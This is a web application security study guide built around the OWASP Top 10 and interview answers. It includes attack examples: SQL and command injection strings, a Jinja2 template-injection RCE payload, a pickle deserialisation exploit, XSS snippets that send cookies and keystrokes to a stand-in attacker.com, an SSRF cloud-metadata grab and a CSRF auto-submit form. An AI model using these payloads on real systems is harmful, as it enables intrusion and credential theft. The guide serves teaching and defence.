Web Application Security Deep Dive
Breadth layernotes-security-core-knowledge.md
OWASP Top 10 Web (2021) — Detailed
A01: Broken Access Control
The #1 vulnerability. Access control enforces that users can only act within their intended permissions.
Common failures
- IDOR (Insecure Direct Object Reference) —
GET /api/orders/1234returns data even when logged in as a different user - Missing function-level access control — admin endpoints accessible by non-admins if URL is known
- Privilege escalation — regular user modifies their role by changing a request parameter
- CORS misconfiguration —
Access-Control-Allow-Originreflects any origin - JWT with tampered
roleclaim accepted without verification
Exploitation example (IDOR)
# Victim's order
GET /api/orders/5678 HTTP/1.1
Authorization: Bearer <attacker_token>
# If server returns 5678's data to attacker → IDORMitigations
- Server-side authorisation on every request — never trust client-supplied IDs without verifying ownership
- Use indirect references (map session-specific IDs to real IDs server-side)
- Log access control failures; alert on repeated failures
Memory hookauthn vs authz, and why access control is #1. Authentication = "are you who you say?" (the bouncer checks your ID). Authorization = "are you allowed in this room?" (the bouncer checks your VIP wristband). IDOR is an authorization failure: you're logged in (authenticated) but the server forgets to check the resource is yours. The reason Broken Access Control rose to #1 in OWASP 2021: authentication is mostly solved by libraries, but authorization is per-object business logic the developer must write on every endpoint — and they forget. Mnemonic: authenti-N = who, authori-Z = what.
A02: Cryptographic Failures
Previously called "Sensitive Data Exposure" — it's really about cryptographic failures that lead to exposure.
Common failures
| Failure | Example |
|---|---|
| Data transmitted in cleartext | HTTP instead of HTTPS; FTP for file transfer |
| Weak algorithms | MD5/SHA-1 for password hashing; DES/RC4 for encryption |
| Hardcoded keys | SECRET_KEY = "mysecret" in source code |
| Improper key storage | Private keys in the repo; keys in env vars logged to stdout |
| Weak random number generation | rand() for session tokens |
| No forward secrecy | RSA key exchange without ECDHE |
Test for it
# Check TLS configuration
testssl.sh https://target.com
# Check for hardcoded secrets
trufflehog filesystem ./repo
gitleaks detect --source=./repoA03: Injection
Any interpreter that processes attacker-controlled data as code.
SQL Injection cheat sheet
-- Comment out rest of query
' --
' #
' /*
-- Always-true condition (authentication bypass)
' OR '1'='1' --
' OR 1=1 --
-- Union-based extraction (find column count first)
' ORDER BY 1 -- (increment until error)
' UNION SELECT NULL,NULL,NULL --
' UNION SELECT username,password,NULL FROM users --
-- Blind boolean (infer data character by character)
' AND SUBSTRING(username,1,1)='a' --
-- Time-based blind
'; IF(1=1) WAITFOR DELAY '0:0:5' -- (MSSQL)
' AND SLEEP(5) -- (MySQL)OS Command Injection
# In user input that reaches shell exec
127.0.0.1; cat /etc/passwd
127.0.0.1 && whoami
127.0.0.1 | id
`id`
$(id)
# Blind — use out-of-band (DNS/HTTP)
127.0.0.1; curl http://attacker.com/$(id)LDAP Injection*)(uid=*))(|(uid=* — bypass LDAP authentication filters
Memory hookall injection is one bugSQLi, command injection, LDAP injection, SSTI, XSS — they're the same root cause wearing different clothes: data crosses a boundary and gets treated as code because it wasn't separated from the instructions. The universal fix is also one idea: keep code and data in separate channels. For SQL that's parameterised queries (the query structure is fixed; data goes in typed placeholders the engine never parses as SQL). String concatenation fails precisely because it merges the channels, letting a
'end the data and start new code. If you can articulate "injection = confusing data for code, fixed by separating the two," you've answered half the AppSec interview.
Template Injection (SSTI)
# Test string — if rendered, SSTI exists
{{7*7}} → 49 (Jinja2, Twig)
${7*7} → 49 (Freemarker, EL)
<%= 7*7 %> → 49 (ERB)
# Jinja2 RCE
{{ ''.__class__.__mro__[1].__subclasses__()[396]('id',shell=True,stdout=-1).communicate() }}A05: Security Misconfiguration
Broad category: anything that's left in an insecure default state.
Common findings
- Default credentials (admin/admin, admin/password) on admin panels, databases, routers
- Verbose error messages exposing stack traces, file paths, DB schema
- Directory listing enabled on web servers
- Unnecessary HTTP methods enabled (TRACE, DELETE, PUT)
- Missing security headers (CSP, HSTS, X-Frame-Options)
- Cloud storage buckets with public read/write
- Debug mode enabled in production (Django
DEBUG=True, Flask debug server) - Open admin interfaces (
/admin,/phpmyadmin,/_admin) accessible from internet
Quick check
# Find admin panels and sensitive paths
gobuster dir -u https://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
# Check HTTP methods
curl -X OPTIONS https://target.com -v
# Check security headers
curl -I https://target.comA08: Software and Data Integrity Failures
Encompasses insecure deserialisation and CI/CD integrity.
Insecure deserialisation
Java:
# ysoserial generates serialised payloads for common gadget chains
java -jar ysoserial.jar CommonsCollections1 'id' | base64Python pickle:
import pickle, os
class Exploit:
def __reduce__(self):
return (os.system, ('id',))
payload = pickle.dumps(Exploit())
# Any system that does pickle.loads(user_input) executes os.system('id')PHP unserialise:
- PHP magic methods
__wakeup(),__destruct()called on deserialisation - If a gadget chain exists in loaded classes, arbitrary code execution follows
MitigationsUse JSON (no code execution). If you must serialise: sign the payload (HMAC) before storing/transmitting; verify before deserialising. Never deserialise untrusted data in Java, PHP, Python pickle.
XSS — Deep Dive
Contexts and Encoding
Memory hookthe three XSS typesStored = the payload lives in the database and hits every viewer (a malicious comment) — most dangerous, "persistent." Reflected = the payload bounces straight back off one request and needs the victim to click a crafted link (search box echoing your query) — "non-persistent." DOM-based = the payload never reaches the server at all; client-side JavaScript reads it from the URL/fragment and writes it into the page. Mnemonic: Stored stays, Reflected rebounds, DOM is decided in the browser. The mitigation differs only in where you encode: server-side output encoding for stored/reflected, safe DOM APIs (
textContent, notinnerHTML) for DOM-based.
XSS depends on where the output lands — different contexts need different encodings:
| Context | Example sink | Required encoding |
|---|---|---|
| HTML body | <div>USER_INPUT</div> | HTML entity encode (&, <, >, ", ') |
| HTML attribute | <input value="USER_INPUT"> | HTML attribute encode |
| JavaScript string | var x = "USER_INPUT" | JS string escape (\, ", ', newlines) |
| URL parameter | <a href="/search?q=USER_INPUT"> | URL encode |
| CSS | style="color: USER_INPUT" | CSS encode |
DOM-based sinks (JavaScript processes input without server involvement):
// Dangerous sinks
document.innerHTML = userInput; // HTML parsed and executed
document.write(userInput);
eval(userInput);
setTimeout(userInput, 1000);
location.href = userInput; // javascript: URI
// Safe alternatives
element.textContent = userInput; // text only, never parsed as HTMLCSP as XSS Defence
Content Security Policy tells the browser which sources of scripts are trusted:
Content-Security-Policy: default-src 'self'; script-src 'self' https://cdn.trusted.com; object-src 'none''nonce-{random}'— allow specific inline scripts with a per-request nonce'strict-dynamic'— trust scripts loaded by trusted scriptsunsafe-inline— negates most XSS protection; avoid- Use CSP Evaluator to test policies
XSS Impact
// Session theft (works if no HttpOnly)
fetch('https://attacker.com/steal?c=' + document.cookie)
// Credential phishing overlay
document.body.innerHTML = '<form action="https://attacker.com">...'
// Keylogger
document.addEventListener('keydown', e => { fetch('https://attacker.com/k?k=' + e.key) })
// BeEF hook — full browser control
<script src="https://attacker.com/hook.js"></script>CSRF — Mechanisms and Mitigations
How It Works
- Victim is authenticated to
bank.com(session cookie is set) - Victim visits
evil.comwhich has:<img src="https://bank.com/transfer?to=attacker&amount=1000"> - Browser automatically sends the request with
bank.com's session cookie - Transfer executes — victim never knew
Memory hookCSRF is the "confused deputy." The browser is a deputy that automatically attaches your bank cookie to any request to bank.com — even one triggered by evil.com. The attacker doesn't steal the cookie (that's XSS); they just get the browser to fire a request that rides on it. This is why HTTPS doesn't help — the forged request is perfectly encrypted and valid; the problem is it was initiated cross-site.
SameSitecookies fix it at the root by telling the browser "don't attach this cookie to cross-site requests at all." Mnemonic: XSS steals the cookie, CSRF rides the cookie.
Works forGET requests that modify state. POST CSRF requires a form on the attacker's page:
<form id="csrf" action="https://bank.com/transfer" method="POST">
<input name="to" value="attacker">
<input name="amount" value="1000">
</form>
<script>document.getElementById('csrf').submit()</script>Mitigations Compared
| Method | How it works | Effectiveness |
|---|---|---|
SameSite=Strict | Browser won't send cookie with any cross-site request | Strong; breaks some OAuth flows |
SameSite=Lax | Cookie sent with top-level navigation GET, not sub-resources | Good default; doesn't protect same-site subdomains |
| CSRF token (synchroniser) | Server generates random token per session; form must include it | Strong if tokens are unpredictable and validated |
| Double-submit cookie | Token in cookie and header/body; server checks they match | Weaker if attacker can set cookies (subdomain takeover) |
| Custom request header | X-Requested-With: XMLHttpRequest requires CORS preflight | Good for APIs; not for forms |
Origin / Referer check | Reject requests from unexpected origins | Fragile; some proxies strip headers |
Authentication and Session Vulnerabilities
Session Management
attacker sets the victim's session ID before login; after login the attacker reuses it. Mitigation: regenerate session ID on login (session_regenerate_id()).
sequential or guessable session IDs (SESS0001, SESS0002). Use CSPRNG with 128+ bits of entropy.
long-lived sessions increase exposure window. Absolute timeout (e.g. 8h) + idle timeout (e.g. 30 min).
allow or deny? Alert on sessions from two different countries simultaneously.
Password Reset Flaws
?token=base64(username+timestamp) — attacker can generate their own
logged by servers, proxies, browser history; use POST body or fragment
tokens valid for hours/days; short-lived (15 min) is better
"user not found" vs "reset email sent" reveals valid accounts
Timing Attacks on Authentication
# Vulnerable — early exit reveals whether username exists
if user not in database:
return "Invalid credentials" # returns faster than if password check runs
if not check_password(password, hash):
return "Invalid credentials" # takes longer
# Safe — always run both checks
user = get_user_or_dummy(username) # always return a user object (with dummy hash if not found)
password_ok = check_password(password, user.hash)
if not user.exists or not password_ok:
return "Invalid credentials"API Security
REST API Security
# Common mistakes
GET /api/v1/users/1234/profile # IDOR — change 1234 to someone else's ID
GET /api/v1/admin/users # Function-level access control missing
GET /api/v1/products?debug=true # Debug parameter left in production
POST /api/v1/login # No rate limiting → brute force
# Mass assignment
PATCH /api/v1/user/profile
{"name": "Bob", "role": "admin"} # If server blindly applies all fieldsGraphQL Security
# Introspection — discover full schema
{ __schema { types { name fields { name } } } }
# Batching DoS — one HTTP request, thousands of operations
[{"query": "{ expensiveOperation }"}, {"query": "..."}, ...] # repeat 1000 times
# Excessive data exposure — query nested fields until you hit interesting data
{ user(id: 1) { friendsList { email phoneNumber socialSecurityNumber } } }
# Mitigation: disable introspection in production, depth limiting, query cost analysisHTTP Security Headers Reference
# Nginx hardened headers config
add_header Strict-Transport-Security "max-age=31536000; includeSubDomains; preload" always;
add_header Content-Security-Policy "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'" always;
add_header X-Frame-Options "DENY" always;
add_header X-Content-Type-Options "nosniff" always;
add_header Referrer-Policy "strict-origin-when-cross-origin" always;
add_header Permissions-Policy "geolocation=(), camera=(), microphone=()" always;
add_header Cross-Origin-Opener-Policy "same-origin" always;
add_header Cross-Origin-Resource-Policy "same-origin" always;
# Remove information-leaking headers
more_clear_headers Server;
more_clear_headers X-Powered-By;| Header | Max protection setting | Notes |
|---|---|---|
| HSTS | max-age=31536000; includeSubDomains; preload | Submit to browser preload list for best protection |
| CSP | Start with default-src 'self', tighten incrementally | Use report-uri first to see what breaks |
| X-Frame-Options | DENY | Superseded by CSP frame-ancestors but still needed for IE |
| X-Content-Type-Options | nosniff | No version/value variation |
| Referrer-Policy | strict-origin-when-cross-origin | Preserves referrer for same-origin, strips path for cross-origin |
Business Logic Vulnerabilities
Logic flaws that scanners can't find — require understanding the application's intended behaviour.
Examples
negative quantities or overflowed values in shopping cart
two requests processed simultaneously spend the same voucher twice, or overdraw an account
skip payment step by going directly to /order/confirm
PATCH request with extra fields sets unintended attributes (e.g. "isAdmin": true)
?as_user=admin or accountId=1 in API body
create circular referral loop; earn infinite credit
Race condition example (TOCTOU)
Thread 1: Check balance (100) → OK
Thread 2: Check balance (100) → OK
Thread 1: Deduct 100 → balance = 0
Thread 2: Deduct 100 → balance = -100 (should have been blocked)Mitigation: database-level locking (SELECT FOR UPDATE), atomic compare-and-swap, idempotency keys.
File Upload Vulnerabilities
Allowing user file uploads is a significant attack surface.
Attack vectors
- Upload
.php/.jsp/.aspxshell — execute code on the server - Upload SVG with
<script>— stored XSS when viewed in browser - Upload HTML — phishing page hosted on trusted domain
- Path traversal in filename —
../../etc/passwd(if filename used in path) - Zip bomb / billion laughs — DoS via decompression
Bypass techniques for extension filters
- Double extension:
evil.php.jpg(old Apache configs parse both) - Case variation:
evil.PHP,evil.pHp - Null byte:
evil.php%00.jpg(older PHP versions truncate at null) - Content-type spoofing: send
image/jpegin Content-Type but upload PHP - Alternate extensions:
.php5,.phtml,.phar
Mitigations
import magic # python-magic (libmagic bindings)
ALLOWED_MIME_TYPES = {'image/jpeg', 'image/png', 'image/gif'}
def validate_upload(file_bytes, filename):
# Check actual content, not extension or Content-Type header
mime = magic.from_buffer(file_bytes[:2048], mime=True)
if mime not in ALLOWED_MIME_TYPES:
raise ValueError(f"Disallowed file type: {mime}")
# Store with a random UUID filename, not user-supplied name
# Store outside webroot so files can't be executed
# Serve via CDN with a separate domain (no cookies, no execution)SSRF — Server-Side Request Forgery
The server is tricked into making a request to a URL the attacker chooses. Because the server makes the request, it can reach places the attacker can't — internal services, cloud metadata, localhost admin panels.
# App fetches a user-supplied URL (image preview, webhook, PDF render, URL importer)
POST /import { "url": "https://example.com/feed.xml" }
# Attacker points it inward:
"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/" # AWS metadata → steal role creds
"url": "http://localhost:6379/" # internal Redis
"url": "http://10.0.0.5:8080/admin" # internal admin panel
"url": "file:///etc/passwd" # local file via file:// schemeMemory hookSSRF turns the server into your proxy. The whole point: the firewall trusts the server, so a request from the server reaches the soft internal network the attacker can't touch directly. The crown jewel is almost always the cloud metadata endpoint
169.254.169.254— on AWS IMDSv1 it hands out temporary IAM credentials to anyone who asks, which is how the 2019 Capital One breach exfiltrated data from S3. That single fact (SSRF → metadata → cloud creds) is the most-cited SSRF interview answer.
Mitigations
- Allowlist destinations (scheme + host) — deny by default; never blocklist (DNS rebinding, redirects, and encodings defeat blocklists).
- Block link-local/internal ranges (
169.254.0.0/16, RFC 1918,localhost) after DNS resolution, and re-validate on every redirect. - Enforce IMDSv2 (requires a session token via PUT, which SSRF usually can't send) — and set hop limit to 1.
- Disable unneeded URL schemes (
file://,gopher://,dict://).
Web Cache Poisoning
Attackers manipulate the cache so that it stores and serves a malicious response to other users.
Mechanism
- Find an unkeyed input — a request header that affects the response but isn't part of the cache key (e.g.
X-Forwarded-Host,X-Original-URL) - Craft a request that uses the unkeyed input to inject malicious content into the response (e.g. a reflected XSS payload via a host header)
- The poisoned response is cached and served to other users
Example
GET / HTTP/1.1
Host: target.com
X-Forwarded-Host: evil.com
# If response reflects X-Forwarded-Host in a script src:
<script src="https://evil.com/analytics.js"></script>
# → cached → served to all users → XSS for everyoneMitigationsInclude all headers that affect the response in the cache key; treat X-Forwarded-* headers carefully; use Vary header to key caches on relevant headers.
Interview Questions
Stored XSS persists the payload server-side — in a comment or profile field — so it executes for every user who views it; it's the most dangerous. Reflected XSS bounces the payload straight back in the response to a single crafted request, so it needs the victim to click a malicious link. DOM-based XSS never involves the server's response — client-side JavaScript reads attacker-controlled input from the URL or fragment and writes it into the DOM unsafely. Mitigations share a core idea — encode output for its context — but differ in where: server-side output encoding plus a strong CSP for stored/reflected, and safe DOM APIs like textContent instead of innerHTML for DOM-based. CSP with nonces is a strong defense-in-depth layer across all three.
On every request the server must independently verify three things, never trusting client input: that the caller is authenticated (valid, unexpired session/token), that the caller is authorized for the specific object requested (object-level ownership — does this order actually belong to this user?), and that the caller is authorized for the action and function (function-level — is this user allowed to hit an admin endpoint?). The object-level check is the one developers forget, producing IDOR. I'd also reject any client-supplied fields that shouldn't be settable (mass-assignment guard), enforce the check server-side regardless of whether the UI hides the option, and log/alert on repeated authorization failures.
Authentication proves identity — who you are; authorization decides what you're allowed to do. An authentication vulnerability is something like credential stuffing or accepting an alg:none JWT, where the system is fooled about who the caller is. An authorization vulnerability is IDOR or missing function-level access control, where the caller is correctly identified but the system fails to check whether they're permitted to access a given resource or action. Mnemonic: authentication = who, authorization = what — and Broken Access Control (authorization) is OWASP's current #1 because it's per-object logic developers must write on every endpoint.
CSRF abuses the browser's habit of automatically attaching a site's cookies to any request to that site, including ones triggered from another site. The attacker hosts a page that fires a state-changing request to the target — a form auto-submit or an image tag — and the victim's browser sends it with their valid session cookie, so it executes as them. HTTPS doesn't help because the forged request is perfectly valid and encrypted; the issue isn't interception, it's that the request was initiated cross-site. SameSite=Strict tells the browser never to attach the cookie to cross-site requests, cutting the attack at the root — though it can break legitimate cross-site navigation and some OAuth flows, which is why Lax is the common default, backed by CSRF tokens for state-changing actions.
SQL injection happens when user input is concatenated into a query string, so a crafted input like ' OR '1'='1 ends the intended data context and injects new SQL logic — the engine can't tell the attacker's quote from the developer's. Parameterized queries (prepared statements) fix it by sending the query structure and the data on separate channels: the database compiles the query with typed placeholders first, then binds the user data as pure values that are never parsed as SQL. Concatenation fails precisely because it merges code and data into one string before the database sees it, so the boundary the attacker exploits exists. It's the same root cause as all injection — confusing data for code — and the same fix — separate the two.
SSRF tricks the server into making a request to an attacker-chosen URL, abusing the server's network position to reach internal services, localhost, or the cloud metadata endpoint at 169.254.169.254 — which on AWS IMDSv1 hands back temporary IAM credentials, exactly how Capital One was breached. To prevent it: allowlist permitted destinations rather than blocklisting (blocklists fall to DNS rebinding, redirects, and encoding tricks); resolve the DNS and then reject internal/link-local ranges, re-validating on every redirect; enforce IMDSv2 so the metadata endpoint requires a token SSRF can't supply; disable dangerous schemes like file:// and gopher://; and ideally make outbound fetches from an isolated egress proxy with no access to internal networks.
CSP is a response header that tells the browser which sources of scripts, styles, and other resources are allowed to load and execute, acting as a second line of defense if an XSS payload slips past output encoding. A good policy disallows inline scripts and only permits scripts from trusted origins or those carrying a per-request nonce, so an injected <script> simply won't run because it lacks the nonce and isn't from an allowed source. It doesn't replace encoding — it's defense-in-depth — and the common mistake that guts it is unsafe-inline. I'd roll it out in report-only mode first to find what breaks, then enforce, ideally with nonces plus strict-dynamic.
The form should be served over HTTPS with a CSRF token and submitted via POST so credentials aren't in the URL. On arrival, the server rate-limits by account and IP to blunt brute force and password spraying, and uses constant-time logic so a missing username and a wrong password are indistinguishable to prevent user enumeration and timing attacks. The password is checked against a slow salted hash like Argon2id, never logged. On success, the server regenerates the session ID to prevent fixation, issues a cookie with HttpOnly, Secure, and SameSite, and ideally triggers MFA and checks the password against breach lists. Failures are logged and feed anomaly detection — impossible travel, many denials. Generic error messages throughout.
Insecure deserialization is reconstructing objects from untrusted serialized data using a format that can execute code during the process. In Python, pickle is the classic case: a class can define __reduce__ to return a callable and arguments that run on load, so an attacker crafts a pickle whose __reduce__ returns (os.system, ('id',)), and any code calling pickle.loads() on attacker-controlled bytes executes that command — full RCE. The same class of bug exists in Java deserialization (ysoserial gadget chains) and PHP unserialize via magic methods. The fix is to never deserialize untrusted data with these formats — use JSON, which only produces inert data structures — and if a rich format is unavoidable, sign the payload with an HMAC and verify before deserializing.
I'd authenticate as two separate users I control, then take a request that returns user A's resource — say GET /api/orders/1001 — and replay it with user A's token but user B's object ID, or with user B's token against user A's ID. If I get the other user's data back, that's IDOR. I'd test every object reference, including ones in the body, headers, and nested resources, and try enumerating sequential or guessable IDs. I'd also check that write operations enforce ownership, not just reads, and that switching from a high-privilege to a low-privilege account doesn't still allow access. Tools like Burp's Autorize automate the "replay with a different user's session" comparison. The fix is server-side object-level authorization on every request, ideally with unguessable identifiers as defense-in-depth.